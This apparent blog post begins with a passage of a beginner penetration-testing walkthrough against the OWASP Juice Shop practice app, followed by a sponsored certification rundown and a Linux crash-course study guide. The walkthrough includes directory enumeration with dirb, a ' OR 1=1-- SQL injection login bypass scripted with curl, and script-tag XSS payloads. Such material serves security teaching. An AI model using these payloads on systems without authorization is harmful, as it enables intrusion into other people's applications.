What is the significance of this configuration? For web crawlers, search engines and well-behaved bots will respect the directive and avoid crawling /ftp, which helps optimize crawling by excluding unnecessary or sensitive paths. From a security perspective, the presence of /ftp in robots.txt can itself be a risk, because it reveals the existence of a potentially sensitive directory; attackers may manually navigate to /ftp to check for files or vulnerabilities. And from a penetration testing perspective, the /ftp entry serves as a clue for ethical hackers and penetration testers to investigate: check the /ftp directory for sensitive files like backups, configurations, or credentials. If you want to look for hidden files, you can use a tool like dirb for directory enumeration: run dirb against the site's /ftp path, and you may be able to access hidden directories under /ftp. I hope you now have a good idea of the /ftp entry; checking for these files is a very important part of penetration testing.
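The manual robots.txt check and the directory enumeration described above, as shell commands (dirb falls back to its default wordlist here; again, only against targets you are permitted to test):

```bash
TARGET=https://juice-shop.herokuapp.com

# Fetch robots.txt directly (bots honor it; humans and tools need not)
curl -s "$TARGET/robots.txt"
# Expected output:
#   User-agent: *
#   Disallow: /ftp

# Enumerate hidden files and directories under the disallowed path
dirb "$TARGET/ftp"
```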
Now let us finally proceed to SQL injection. SQL injection is a technique used to manipulate a website's database by injecting malicious SQL code into an input field. The steps are as follows: go to the login page (click Account, then Login) and enter credentials containing a payload, for example a username or email of ' OR 1=1-- with any password, or with the password left blank. You can see that with this payload injected I am not able to log in, so this form appears to be secured against it. Let us also try another email with some password, or leave it blank; it still asks for a password, and on submitting it says "invalid email or password," which simply means we are not registered here.

Let me explain what I am trying to do. The payload I am injecting, ' OR 1=1--, is designed to break the SQL query logic. Suppose the application builds a query like SELECT * FROM users WHERE username = '<input>' AND password = '<input>'; injecting the payload turns the condition into username = '' OR 1=1, with the rest commented out. The OR 1=1 condition always evaluates to true, so it bypasses the authentication, and the -- comments out the remainder of the SQL query, ignoring the password check. This is SQL injection: putting something malicious inside the query the application runs. If you can successfully log in without valid credentials, the application is vulnerable to SQL injection; but as you can see, that is not happening here, and even leaving the password out does not log us in, so this form is not vulnerable to this basic SQL injection.
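For completeness, the same probe can be scripted instead of typed into the form. A small sketch follows; the /rest/user/login path is an assumption based on how Juice Shop's frontend talks to its API (verify it in your browser's network tab before relying on it), and the payload mirrors the one above:

```bash
TARGET=https://juice-shop.herokuapp.com

# Send the ' OR 1=1-- payload to the (assumed) JSON login endpoint
curl -s -X POST "$TARGET/rest/user/login" \
  -H "Content-Type: application/json" \
  -d "{\"email\": \"' OR 1=1--\", \"password\": \"anything\"}"

# A response containing an authentication token would indicate the login
# is injectable; an error message mirrors the failure we saw in the browser.
```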
Now let us try cross-site scripting. Cross-site scripting, or XSS, is an attack that injects malicious scripts into a website, which are then executed in the browsers of unsuspecting users. The steps to test for XSS: first, identify the input fields, such as the search bar or a feedback form on this website, and enter a payload. Let us go to the search bar, right-click, and choose Inspect to find where the input ends up in the markup (Ctrl+F helps you search for it). Now let us perform the XSS attempt: with the web application open, we target this input field and try to inject a payload of the form <script>alert('XSS')</script> via the developer tools. If the alert box pops up, the input field is vulnerable to an XSS attack; so I have inserted <script>alert('XSS')</script>, and if a pop-up appears, it indicates that this website is vulnerable to XSS. In this way you can perform the exploitation.

If you cannot manually insert the tag, you can modify the existing DOM instead: locate the input field in the developer tools, right-click on that input element, manually replace its value, press Enter to save the changes, and check whether the script executes. Here, right-clicking shows nothing happening, so that path is fine. Alternatively, you can do the same thing from the console: select the input field with document.querySelector (here the search field is the mat-input-0 element), set its value to the XSS payload, and then, if applicable, trigger the search programmatically with the form's submit method (document.querySelector('form').submit()). If the pop-up appears, the XSS injection succeeded.

If you still cannot inject the script, first inspect the sanitization logic: review how the application processes your input, since some apps escape dangerous characters such as the angle brackets and the script tag itself. Then test alternative input fields: try other forms or query parameters where your script might work. So this was a small introduction to pen testing using various tools present in Kali Linux.

Cyber security is not just a job; it is a war zone where organizations fight daily to protect their most valuable assets, data and systems. The stakes have never been higher, and the demand for skilled professionals is rapidly growing: a trusted survey predicts millions of cyber security job openings in India alone by next year. But here is the harsh reality: most candidates lack the skills the industry demands. This is where certifications come in. You have probably heard people ask: why do certifications, why not just get a degree? Let me tell you the truth: college programs often fail to keep up with the fast-changing demands of the cyber security industry. Certifications, on the other hand, are laser-focused on the skills you actually need; they are faster, more affordable, and targeted. So whether you are a fresher or a professional looking to climb the ladder, certifications are your best bet. Let us explore the top five certifications that can give you the edge to land that dream cyber security job.

Now you might be thinking: "I am not from an IT background; can certifications really help me?" Or maybe you have graduated with a computer science degree and are wondering why you should bother with certifications. Let me explain why certifications are so powerful. First, if you are from a non-IT background, certifications can open doors you never thought possible: they provide hands-on, practical skills that employers value far more than theoretical knowledge. For example, even if you have never written a single line of code, certifications like CompTIA Security+ or Certified Ethical Hacker can teach you the foundational skills needed to land your first job in cyber security. On the other hand, if you are already a computer science graduate, certifications allow you to specialize: cyber security is a vast field, and employers look for specialists in areas like penetration testing, risk management, or compliance. A certification like CISSP can turn your general degree into a targeted resume that signals expertise. Here is why certifications are such a game changer: they boost your resume by adding instant credibility, showing you have invested in gaining expertise; they align with industry trends, ensuring your skills match current standards; and they demonstrate your commitment to your career, giving you a competitive edge that makes you stand out to hiring managers in a crowded job market. So now let us explore the top five certifications that can take your cyber security career to the next level.

Let us begin with the very first certification at the top of the list: Certified Information Systems Security Professional (CISSP), widely regarded as the gold standard in cyber security certification. It is offered by (ISC)², one of the most respected organizations in this field, and is essential for professionals who want to lead cyber security efforts at an enterprise level. CISSP is a comprehensive certification that covers eight key cyber security domains, such as risk management,
security operations, and software development security. It is designed for experienced professionals and proves you have the expertise to design, implement, and manage a robust cyber security program; organizations worldwide trust CISSP-certified professionals to handle sensitive security needs. As for eligibility, you need at least five years of professional experience in at least two of the eight domains; a bachelor's degree in computer science, or equivalent experience, is preferred. Even without the full experience you can take the exam and earn the Associate title while you complete the required work experience. Regarding exam details and cost: the CISSP exam is about six hours long with 250 questions, and the fee to register and sit for it is around ₹61,000 in India (about $749 in the US). CISSP opens doors to senior roles such as Chief Information Security Officer, earning around ₹76 lakh per year in India and $150,000+ per year in the US, and Senior Security Consultant, earning around ₹13 lakh per year in India and $120,000 per year in the United States. CISSP is more than just a credential; it is a symbol of expertise, leadership, and trust in the cyber security world, and for anyone serious about advancing in this field, it is the certification to aim for. If you are looking for specialized training for the CISSP examination, consider Simplilearn's CISSP certification training: a globally acclaimed program aligned with the latest (ISC)² exam pattern, offering comprehensive coverage of all eight domains with live online classes, hands-on labs, and expert guidance. With features like simulation tools, test papers, and an included CISSP exam voucher, Simplilearn ensures you are exam-ready, and their 100% money-back exam-pass guarantee adds extra confidence as you work toward elevating your cyber security credentials.

Next on our list is CISA, the Certified Information Systems Auditor, a highly respected certification from ISACA focusing on auditing, compliance, and risk management. It is perfect for professionals responsible for evaluating and improving an organization's security framework. CISA is recognized worldwide, especially in highly regulated industries like finance, healthcare, and government; it demonstrates expertise in identifying vulnerabilities, ensuring compliance, and improving security controls. For eligibility, you need at least five years of work experience in IT audit, control, or security; a bachelor's degree can waive up to two years of this requirement. As for exam details and cost: the exam is four hours long with 150 questions testing your knowledge of auditing and compliance, and the fee is around ₹47,141 ($575) for ISACA members and around ₹62,000 ($760) for non-members. In terms of career opportunities and salaries, CISA-certified professionals can secure roles like IT Audit Manager, earning around ₹20 lakh per year in India and $130,000 per year in the United States, and Compliance Program Manager, earning around ₹24 lakh per year in India and $140,000 per year in the United States. With organizations increasingly prioritizing governance and compliance, CISA has become a critical certification for professionals in these areas; it is a must-have for those who want to
specialize in auditing and risk management. If you want to boost your career in IT auditing and compliance, you can consider Simplilearn's CISA certification training: as an accredited training partner of ISACA, Simplilearn offers comprehensive preparation, including live classes by industry experts, access to the official ISACA learning kit, and simulation tests to help you master the 2024 CISA exam. The training provides an up-to-date curriculum and practical insights, and with an exam-pass guarantee and flexible learning options, Simplilearn ensures you are fully prepared to achieve CISA certification and advance your professional journey.

The third certification on the list is Certified Information Security Manager (CISM), another certification from ISACA, aimed at managers and leaders in cyber security; it is ideal for professionals who want to transition into leadership roles. CISM focuses on the strategic and managerial aspects of cyber security, such as governance, incident management, and program development, and it is valued by organizations seeking security leaders who can make informed, high-level decisions. For eligibility, you need five years of experience in information security management; a degree or another relevant certification can waive up to two years of this requirement. As for exam details and cost: the exam is four hours long with 150 questions assessing your strategic thinking, and the fee is around ₹47,000 ($575) for ISACA members and around ₹62,000 ($760) for non-members. CISM-certified professionals often step into leadership roles such as Director of Information Security, earning around ₹37 lakh per year in India and $160,000 per year in the United States, and Data Governance Manager, earning around ₹30 lakh per year in India and $140,000 per year in the United States. For those aiming to lead cyber security teams and make strategic decisions, CISM provides the credibility and expertise needed to succeed. If you want to elevate your career into a leadership role, Simplilearn's CISM certification training can be an ideal choice: as an ISACA elite training partner, Simplilearn provides a learning kit including the ISACA review manual, Q&A, and an exam voucher, along with live classes conducted by industry experts.

Fourth on the list we have CompTIA Security+, the perfect entry-level certification for building core cyber security skills. It is vendor-neutral, which means it is recognized across industries and applies to various technologies. Security+ covers essential topics like network security, threat management, and compliance; it is designed to give beginners a strong foundation in cyber security and prepare them for real-world challenges. For eligibility, there are no strict prerequisites, but CompTIA recommends having basic IT experience or earning the Network+ certification first. As for exam details and cost: the 90-minute exam includes both multiple-choice and performance-based questions, and the registration fee is around ₹30,000 (about $370). With Security+ you can pursue roles like Security Engineer, earning around ₹8.2 lakh per year in India and $95,000 per year in the United States, and Cloud Engineer, earning up to around ₹
6 lakh per year in India and $85,000 per year in the United States. Security+ is an affordable, impactful way to start your cyber security journey, making it an excellent choice for beginners. If you are looking to begin your cyber security career with confidence, consider Simplilearn's CompTIA Security+ certification training, which provides comprehensive coverage of all the exam objectives and focuses on real-world applications to prepare you for industry challenges; flexible learning options and 24/7 assistance make it an excellent choice for learners worldwide.

Finally, we have CEH, the Certified Ethical Hacker, on the list: the perfect certification for those who dream of thinking like a hacker in order to protect systems. Offered by EC-Council, this credential focuses on the skills needed for penetration testing and ethical hacking. CEH is a hands-on certification that teaches you to identify vulnerabilities, detect attacks, and secure systems; it is a great choice for professionals drawn to ethical hacking and proactive cyber security. For eligibility, you need two years of experience in information security, or completion of EC-Council's official training program. As for exam details and cost: the exam is around four hours long with 125 multiple-choice questions, and the exam fee is around ₹98,000 ($1,199). CEH-certified professionals often work as Penetration Testers, earning an average of around ₹5 lakh per year in India and $85,000 per year in the United States, and Cyber Security Engineers, earning around ₹7.3 lakh per year in India and $100,000 in the United States. CEH is perfect for professionals who want to specialize in offensive security and ethical hacking; it is an exciting certification that paves the way for dynamic, high-impact roles. If you are ready to step into the world of ethical hacking, Simplilearn's CEH v13 certification training is a strong choice: accredited by EC-Council, the course includes the official EC-Council courseware with AI-driven tools and an exam voucher, and with hands-on labs, live sessions, and cutting-edge tools, Simplilearn equips you to excel in penetration testing and more. If you have any doubts or questions, ask them in the comments section below; our team of experts will reply as soon as possible. Thank you, and keep learning with Simplilearn.

    By Amjad Izhar
    Contact: amjad.izhar@gmail.com
    https://amjadizhar.blog

  • Linux Terminal Mastery: Commands, Shells, and File Systems

    Linux Terminal Mastery: Commands, Shells, and File Systems

    This text is a transcript of a Linux crash course aimed at beginners. The course, offered by Amigo’s Code, covers the fundamentals of the Linux operating system, including its history, features, and various distributions. It guides users through setting up a Linux environment on Windows and macOS using tools like UTM and VirtualBox. The curriculum further explores essential Linux concepts like file systems, user management, and commands, including the use of the terminal. The course then introduces Bash scripting, covering variables, conditionals, loops, functions, and the creation of automated scripts. The goal of the course is to equip learners with the skills necessary to effectively use Linux for software development, DevOps, or system administration roles.

    Linux Crash Course Study Guide

    Quiz

    1. What is Linux and who developed it?

    Linux is a powerful and flexible operating system developed by Linus Torvalds in 1991. Unlike operating systems such as Windows and macOS, Linux is open source and allows developers around the world to contribute and customize.

    2. What are the key features of Linux that make it a preferred choice for servers?

    The key features are stability, security, the ability to be customized to specific needs, and performance. Due to these factors, servers worldwide often prefer Linux.

    3. What is a Linux distribution? Name three popular distributions.

    A Linux distribution is a specific version or flavor of the Linux operating system tailored for different purposes. Three popular distributions are Ubuntu, Fedora, and Debian.

    4. Explain what UTM is and why it’s used in the context of the course.

    UTM is an application that allows users to securely run operating systems, including Linux distributions like Ubuntu, on macOS. It’s used in the course to demonstrate how to set up and run Linux on a Mac.

    5. What is VirtualBox and how is it used for Windows users in the course?

    VirtualBox is a virtualization software that allows Windows users to install and run other operating systems, including Linux distributions like Ubuntu, within a virtual environment.

    6. What is the difference between a terminal and a shell?

    A terminal is a text-based interface where users type commands and view output. A shell is a program that interprets and executes those commands, acting as an intermediary between the user and the operating system.

    7. What is Zsh, and why is it used in this course?

    Zsh (Z shell) is an extended version of the Bourne shell, known for its advanced features like auto-completion, spelling correction, and plugin support. It is used in the course to provide a more customizable and efficient command-line experience.

    8. What is Oh My Zsh, and what does it offer?

    Oh My Zsh is an open-source framework for managing Zsh configuration. It includes numerous helpful functions, helpers, plugins, and themes to enhance the Zsh experience.

    9. Explain the command sudo apt update. What does it do?

    sudo apt update updates the package index files on the system. These files contain information about available packages and their versions. The sudo ensures the command is executed with administrative privileges.

    10. What is a Linux command and what are its three main parts?

    A Linux command is a text instruction that tells the operating system what action to perform. The three main parts are the command itself, options (or flags) which modify the command’s behavior, and arguments, which specify the target or input for the command.
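For instance, a minimal sketch showing all three parts in a single command:

```bash
# command:  ls      (the program to run)
# option:   -l      (a flag that modifies behavior: long listing format)
# argument: /home   (the target the command operates on)
ls -l /home
```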

    Quiz Answer Key

    1. What is Linux and who developed it?

    Linux is a powerful and flexible operating system developed by Linus Torvalds in 1991. It’s open-source and allows for worldwide contributions.

    2. What are the key features of Linux that make it a preferred choice for servers?

    Key features include stability, security, customizability, and performance, making it ideal for servers.

    3. What is a Linux distribution? Name three popular distributions.

    A Linux distribution is a specific version of Linux. Ubuntu, Fedora, and Debian are examples.

    4. Explain what UTM is and why it’s used in the context of the course.

    UTM lets macOS users run other operating systems, including Ubuntu. The course uses it to set up Linux on a Mac.

    5. What is VirtualBox and how is it used for Windows users in the course?

    VirtualBox is a virtualization software. It allows Windows users to run Linux within a virtual environment.

    6. What is the difference between a terminal and a shell?

    A terminal is the interface for typing commands. The shell interprets and executes these commands.

    7. What is Zsh, and why is it used in this course?

    Zsh is an improved shell with features like auto-completion. The course uses it for a better command-line experience.

    8. What is Oh My Zsh, and what does it offer?

    Oh My Zsh is a framework for managing Zsh configuration. It provides themes and plugins to customize the shell.

    9. Explain the command sudo apt update. What does it do?

    sudo apt update updates package lists, requiring administrative privileges through sudo.

    10. What is a Linux command and what are its three main parts?

    A Linux command is a text instruction to the OS. It consists of the command, options, and arguments.

    Essay Questions

    1. Discuss the advantages of using Linux as a server operating system compared to Windows Server. Consider factors such as cost, security, and customization.
    2. Explain the significance of open-source development in the context of Linux. How does the collaborative nature of its development benefit the Linux community and users?
    3. Compare and contrast the roles of the terminal and the shell in a Linux environment. How do they interact to enable users to control the operating system?
    4. Describe the process of installing Ubuntu on both macOS (using UTM) and Windows (using VirtualBox). What are the key differences and considerations for each platform?
    5. Discuss the importance of Linux file permissions and user management in maintaining a secure and stable system. Provide examples of how incorrect permissions can lead to security vulnerabilities.

    Glossary of Key Terms

    • Linux: A powerful and flexible open-source operating system kernel.
    • Distribution (Distro): A specific version of Linux that includes the kernel and other software.
    • Open Source: Software with source code that is publicly available and can be modified and distributed.
    • Terminal: A text-based interface used to interact with the operating system.
    • Shell: A command-line interpreter that executes commands entered in the terminal.
    • Zsh (Z Shell): An extended version of the Bourne shell with advanced features and plugin support.
    • Oh My Zsh: An open-source framework for managing Zsh configuration.
    • Command: An instruction given to the operating system to perform a specific task.
    • Option (Flag): A modifier that changes the behavior of a command.
    • Argument: Input provided to a command that specifies the target or data to be processed.
    • Sudo: A command that allows users to run programs with the security privileges of another user, typically the superuser (root).
    • UTM: An application that allows you to run operating systems on macOS devices.
    • VirtualBox: Virtualization software that allows you to run different operating systems on your computer.
    • Operating System: The software that manages computer hardware and software resources.
    • Server: A computer or system that provides resources, data, services, or programs to other computers, known as clients, over a network.
    • Root Directory: The top-level directory in a file system, from which all other directories branch.
    • File System: A method of organizing and storing files on a storage device.
    • Directory (Folder): A container in a file system that stores files and other directories.
• GUI: Graphical User Interface. A user interface that allows users to interact with electronic devices through graphical icons and visual indicators, as opposed to text-based interfaces that rely on typed commands or text navigation.

    Linux Crash Course: A Beginner’s Guide

    Okay, here’s a detailed briefing document summarizing the main themes and ideas from the provided text:

    Briefing Document: Linux Crash Course Review

    Overall Theme: This document is a transcript of a video presentation promoting a “Linux Crash Course.” The course aims to take complete beginners to a point of understanding and mastering Linux, particularly in the context of software engineering, DevOps, and related fields. The presenter emphasizes that Linux is a fundamental skill in these areas.

    Key Ideas and Facts:

    • Linux Overview: Linux is described as a “powerful and flexible operating system” developed by Linus Torvalds in 1991.
    • A key feature of Linux is that it’s “open source,” with developers worldwide contributing to its improvement and customization.
    • Linux boasts “stability, security, the ability of changing it to your needs, and performance,” which is why it is preferred for servers globally.
    • Linux is used by “internet giants, scientific research companies, financial institutions, government agencies, educations,” and pretty much every company out there.
    • Amigo’s Code itself is deployed on a Linux server.
    • Linux is versatile, used on a wide range of devices from smartphones to servers and the Raspberry Pi.
    • Linux Distributions: Linux comes in different “flavors” called distributions.
    • Ubuntu is highlighted as the “most popular flavor of Linux.” It comes in server and desktop versions (the latter with a graphical user interface).
    • Other distributions mentioned include Fedora, Debian, and Linux Mint.
    • Companies often customize Linux distributions to meet their specific needs.
    • Course Promotion: The presenter encourages viewers to subscribe to the channel and like the video.
    • The full 10-hour course is available on their website, with a coupon offered.
    • The course aims to “make sure that you become the best engineer that you can be.”
    • The course caters to Windows users as well as Mac users.
    • Setting up Linux (Ubuntu) on Different Operating Systems: on a Mac, the presentation details how to install Ubuntu using an application called UTM (virtualization software).
    • On Windows, Ubuntu is installed through VirtualBox.
    • Understanding the Terminal: the terminal allows users to interact with the operating system by entering commands.
    • Understanding the Shell: the shell is a program for interacting with the operating system; it interprets the commands entered in the terminal.
    • Z Shell (Zsh): Zsh, also called the Z shell, is an extended version of the Bourne shell with plenty of new features and support for plugins and themes.
    • Linux Commands: they are case sensitive.
    • Linux File System: the hierarchical structure used to organize and manage files and directories in a Linux operating system.
    • Files and Permissions: Linux is a multi-user environment that allows us to keep each user’s files separate from other users’.
    • Shell Scripting: writing scripts for the shell, which is essentially a command-line interpreter.

    Quotes:

    • “If you don’t know Linux and also if you are afraid of the terminal or the black screen then you are in big trouble so this course will make sure that you master Linux”
    • “Linux is a must and don’t you worry because we’ve got you covered”
    • “Linux it’s a powerful and flexible operating system”
    • “Linux is open source developers around the world contribute to improve and customize the operating system”
    • “servers around the world prefer Linux due to its performance”
    • “Linux is open source but it’s also used on a wide range of devices from smartphones to servers and also Raspberry Pi”
    • “Ubuntu is the most popular flavor out there”
    • “At Amigo’s code we want to make sure that you become the best engineer that you can be”
    • “So many original features were added so let’s together install zsh and as you saw the default shell for Mac OS now is zsh or zshell”
    • “We’ve got Bash as well as csh, dash, ksh, tcsh and then zsh”

    Potential Audience:

    • Beginners with little to no Linux experience.
    • Software engineers, DevOps engineers, backend/frontend developers.
    • Individuals seeking to enhance their skills and career prospects in the tech industry.

    In summary: The document outlines a Linux crash course that aims to provide individuals with the necessary skills to confidently navigate and utilize the Linux operating system in various professional tech roles. It covers core concepts, practical setup, and promotes the course as a means to become a proficient engineer.

    Linux and Shell Scripting: A Quick FAQ

    FAQ on Linux

    Here is an 8-question FAQ about Linux and shell scripting, based on the provided source material.

    1. What is Linux and why is it important for aspiring engineers?

    Linux is a powerful and flexible operating system developed by Linus Torvalds in 1991. Its open-source nature allows developers worldwide to contribute to its improvement and customization. Its stability, security, and performance make it a preferred choice for servers and various devices, ranging from smartphones to Raspberry Pi. For aspiring software, DevOps, or backend engineers, understanding Linux is crucial because most companies deploy their software on Linux servers, making it an essential skill.

    2. What are Linux distributions and how do they differ?

    Linux distributions (distros) are different “flavors” of the Linux operating system, each customized to suit specific needs. Popular distributions include Ubuntu, Fedora, Debian, and Linux Mint. Ubuntu, particularly its server and desktop versions, is a popular choice for many, while other distributions cater to specific requirements in different companies. The source material mentions Ubuntu will be used in the course.

    3. How can I install Linux (Ubuntu) on my Mac?

    On a Mac, Ubuntu can be installed using virtualization software like UTM. First, download and install UTM from the Mac App Store. Then, download the Ubuntu server ISO image from the Ubuntu website. Within UTM, create a new virtual machine, selecting the downloaded ISO image as the boot source. Configure memory and disk space as needed, and start the virtual machine to begin the Ubuntu installation process. The source material also highlights the Ubuntu gallery in UTM.

    4. How can I install Linux (Ubuntu) on my Windows machine?

    On Windows, you can use VirtualBox. Download and install VirtualBox, then download the Ubuntu desktop ISO image from the Ubuntu website. Create a new virtual machine in VirtualBox, select the downloaded ISO image, configure memory and disk space, and install Ubuntu in the VM.

    5. What is the difference between the Terminal and the Shell?

    The terminal is a text-based interface that allows you to interact with the operating system by entering commands. It provides the prompt where commands are entered and outputs the results. The shell, on the other hand, is the program that interprets the commands entered in the terminal and executes them against the operating system. Shells include Bash, Zsh, Fish, and others.
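    To check which shell your terminal is actually running, two standard commands help (available on most Linux and macOS systems):

        echo $SHELL       # print the current user's default login shell
        cat /etc/shells   # list the shells installed on the system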

    6. What is Zsh and how do I switch from Bash to Zsh?

    Zsh (Z shell) is an extended version of the Bourne shell, known for its advanced features like auto-completion, spelling correction, and a powerful plugin system. To switch from Bash to Zsh, first install Zsh using the command sudo apt install zsh. Then, change the default shell using the command chsh -s /usr/bin/zsh. After rebooting the system, Zsh will be the default shell. Oh My Zsh can be used to configure Zsh.
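    Putting those steps together, here is a minimal sketch for a Debian/Ubuntu-style system (the zsh path is commonly /usr/bin/zsh, but verify it on your machine):

        sudo apt install zsh     # install zsh from the package repositories
        which zsh                # confirm where zsh was installed
        chsh -s /usr/bin/zsh     # make zsh the default login shell

    New terminal sessions pick up the change after you log out and back in (or reboot, as the source suggests).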

    7. What are Linux commands, options, and arguments?

    Linux commands are text instructions that tell the operating system what to do. They are case-sensitive. A command can include options and arguments that modify its behavior. For example, in the command ls -a ., ls is the command, -a is an option (for showing hidden files), and . is the argument (specifying the current directory).
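    To illustrate that anatomy, each part below varies independently:

        ls              # command only: list the current directory
        ls -a           # command + option: also show hidden files
        ls -a /tmp      # command + option + argument: list /tmp instead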

    8. What are user types and how do permissions work?

    Linux is a multi-user environment with two main types of users: normal users and the superuser (root). Normal users can modify their own files but cannot make system-wide changes. The superuser (root) can modify any file on the system. Permissions control access to files and directories. The ls -l command displays file permissions, divided into three sets: user, group, and others. Each set includes read (r), write (w), and execute (x) permissions, dictating what actions each user type can perform on the file.
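    As a worked example, a long-listing line can be read field by field (the file name, owner, group, and size here are hypothetical):

        $ ls -l script.sh
        -rwxr-xr--  1 amigos devs  512 Jan 10 09:30 script.sh
        # -     regular file (a d here would mean directory)
        # rwx   user (owner): read, write, and execute
        # r-x   group: read and execute
        # r--   others: read only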

    Understanding Linux: Features, Usage, and Commands

    Linux is a powerful and flexible open-source operating system that was developed by Linus Torvalds in 1991 and has since become a robust platform used worldwide. Here’s an overview of some key aspects of Linux:

    • Open Source: Linux is open source, meaning developers can contribute to improving and customizing it.
    • Key Features: Stability, security, customizability, and performance are key features. Its flexibility and security make it a preferred choice for companies.
    • Usage: Linux is used by internet giants, scientific research companies, financial institutions, government agencies, and educational institutions. Many companies deploy their software on Linux.
    • Distributions: Linux has different versions called distributions, with Ubuntu being the most popular. Other distributions include Fedora, Debian, and Linux Mint.
    • Terminal: In Linux, the terminal (also known as the command line interface or CLI) is a text-based interface that allows interaction with the computer’s operating system by entering commands. It provides a way to execute commands, navigate the file system, and manage applications without a graphical user interface.
    • Shell: A shell is a program that interacts with the operating system. The terminal allows users to input commands to the shell and receive text-based output from the shell operations. The shell is responsible for taking the commands and executing them against the operating system.
    • File System: The Linux file system is a hierarchical structure that organizes and manages files and directories. It follows a tree structure with the root directory at the top, and all other directories are organized below it (a sample listing follows this list).
    • Commands: Linux commands are case-sensitive text instructions that tell the operating system what to do.
    • Shell Scripting: Shell scripting automates tasks and performs complex operations by creating a sequence of commands. A shell script is saved with the extension .sh.
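    To see the top of that tree for yourself, list the root directory; the exact entries vary by distribution, but on Ubuntu they typically include the directories covered later in this document:

        ls /
        # bin  boot  dev  etc  home  lib  tmp  usr  var  ...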

    Shell Scripting Fundamentals in Linux

    Shell scripting is a way to automate tasks and perform complex operations in Linux by creating a sequence of commands. It involves writing scripts, typically saved with a .sh extension, that contain a series of commands to be executed.

    Key aspects of shell scripting include the following (an example script tying them together appears after the list):

    • Bash: Bash (Bourne Again Shell) is a command line interpreter used to communicate with a computer using text-based commands.
    • Editor: A text editor is needed to write scripts; this could be a simple editor like Vim or a more feature-rich option like Visual Studio Code.
    • Shebang: The first line of a shell script typically starts with a “shebang” (#!) followed by the path to the interpreter (e.g., #!/bin/bash). This line tells the operating system which interpreter to use to execute the script.
    • Variables: These are containers for storing and manipulating data within a script. In Bash, variables can hold various data types like strings, numbers, or arrays.
    • Conditionals: These allow scripts to make decisions based on specific conditions, executing different blocks of code depending on whether a condition is true or false.
    • Loops: Loops enable the repetition of instructions. for and while loops can iterate over lists or directories, or continue a task until a condition is met.
    • Functions: Functions group a set of commands into a reusable block, promoting code modularity and organization.
    • Comments: Adding comments to scripts is considered a best practice, as it helps in understanding the script’s purpose, functionality, and logic. Comments are lines in a script that are not executed as code but serve as informative text.
    • Passing Parameters: Bash scripts can receive input values, known as parameters or arguments, from the command line, allowing customization of script behavior. These parameters can be accessed within the script using special variables like $1, $2, $3, etc. The special variable $@ can be used to access all parameters passed to the script.
    • Executable Permissions: Scripts must be given executable permissions using chmod before they can be run.
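    Here is a minimal sketch that pulls these elements together. The file name greet.sh, the greet function, and the parameter handling are all hypothetical, but every construct shown is standard Bash:

        #!/bin/bash
        # greet.sh - demonstrates variables, conditionals, loops,
        # functions, comments, and parameters

        # Variable: a container for data
        greeting="Hello"

        # Function: a reusable block of commands
        greet() {
            echo "$greeting, $1!"
        }

        # Conditional: fail early if no parameters were passed
        if [ $# -eq 0 ]; then
            echo "Usage: ./greet.sh name [name ...]"
            exit 1
        fi

        # Loop: iterate over every parameter ($@)
        for name in "$@"; do
            greet "$name"
        done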

    To run a shell script (a sample session follows the steps):

    1. Save the script with a .sh extension.
    2. Give the script executable permissions using the chmod +x scriptname.sh command.
    3. Execute the script by using its path. If the script is placed in a directory included in the PATH environment variable, it can be run by simply typing its name.
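    Continuing with the hypothetical greet.sh from above, a typical session would be:

        chmod +x greet.sh        # step 2: grant executable permission
        ./greet.sh Alice Bob     # step 3: run the script by its path
        # Hello, Alice!
        # Hello, Bob!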

    Linux File Management: A Command-Line Guide

    File management in Linux involves organizing, creating, modifying, and deleting files and directories. This is primarily done through the command-line interface (CLI) using various commands.

    Key aspects of file management include:

    • Linux File System: The file system is a hierarchical structure with a root directory (/) at the top, under which all other directories are organized.
    • Essential Directories:
    • /bin: Contains essential user commands.
    • /etc: Stores system configuration files.
    • /home: The home directory for users, storing personal files and settings.
    • /tmp: A location for storing temporary data.
    • /usr: Contains read-only application support data and binaries.
    • /var: Stores variable data like logs and caches.
    • Basic Commands:
    • ls: Lists files and directories. Options include -a to show hidden files and -l for a long listing format that includes permissions, size, and modification date.
    • cd: Changes the current directory. Using cd .. moves up one directory level. Using cd - flips between the previous and current directory.
    • mkdir: Creates a new directory. The -p option creates nested directories.
    • touch: Creates a new file.
    • rm: Removes files.
    • rmdir: Removes empty directories.
    • cp: Copies files.
    • File Permissions: Linux uses a permission system to control access to files and directories. Permissions are divided into three categories: user, group, and others. Each category has read (r), write (w), and execute (x) permissions. The ls -l command displays file permissions in a long listing format.
    • Working with Files:
    • To create an empty file, use the touch command.
    • To create a file with content, use the echo command with output redirection (>) to write a string into the file.
    • To view the contents of a file, you can use a text editor or command-line tools like cat.
    • Working with Directories:
    • To create directories, use the mkdir command.
    • To remove empty directories, use the rmdir command.
    • To remove directories and their contents, use the rm -rf command.
    • Navigating the File System: To navigate, use the cd command followed by the directory path.

    It is important to note that commands are case-sensitive.
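    Tying the commands above together, here is a short illustrative session; the directory and file names are made up:

        mkdir -p projects/demo           # create nested directories in one go
        cd projects/demo                 # move into the new directory
        touch notes.txt                  # create an empty file
        echo "first line" > notes.txt    # redirect a string into the file
        cat notes.txt                    # view the file's contents
        cp notes.txt backup.txt          # copy the file
        cd ../..                         # move back up two levels
        rm -rf projects                  # remove the directory and its contents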

    Linux User and File Permissions Management

    User permissions in Linux control access to files and directories in a multi-user environment. Here’s an overview:

    • Types of Users There are normal users and superusers (root).
    • Normal users can modify their own files but cannot make system-wide changes or alter other users’ files.
    • Superusers (root) can modify any file on the system and make system-wide changes.
    • Commands for User Management (see the sample session after this list):
    • sudo: Executes a command with elevated privileges.
    • useradd -m username: Adds a new user and creates a home directory.
    • passwd username: Sets the password for a user.
    • su username: Substitutes or switches to another user.
    • userdel username: Deletes a user.
    • File Permissions: Permissions determine who can read, write, or execute a file.
    • The ls -l command displays file permissions in a long listing format. The output includes the file type, permissions, number of hard links, owner, group, size, and modification date.
    • The file type is the first character. A d indicates a directory, and a - indicates a regular file.
    • Permissions are divided into three sets of three characters each, representing the permissions for the user (owner), group, and others.
    • r means read, w means write, and x means execute. A - indicates that the permission is not granted.
    • The first three characters belong to the user, the second three to the group, and the last three to everyone else.
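    As a sketch of how the user-management commands combine in practice (the username dev1 is hypothetical, and useradd, passwd, and userdel require root privileges, hence sudo):

        sudo useradd -m dev1    # add a user and create a home directory
        sudo passwd dev1        # set the new user's password
        su dev1                 # switch to the new user
        exit                    # return to the original user
        sudo userdel dev1       # delete the user again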

    Essential Linux Terminal Commands

    Linux terminal commands are case-sensitive text instructions that tell the operating system what to do. These commands are entered in the terminal (also known as the command line interface or CLI), allowing you to interact with the operating system. The terminal provides a way to execute commands, navigate the file system, and manage applications without a graphical user interface.

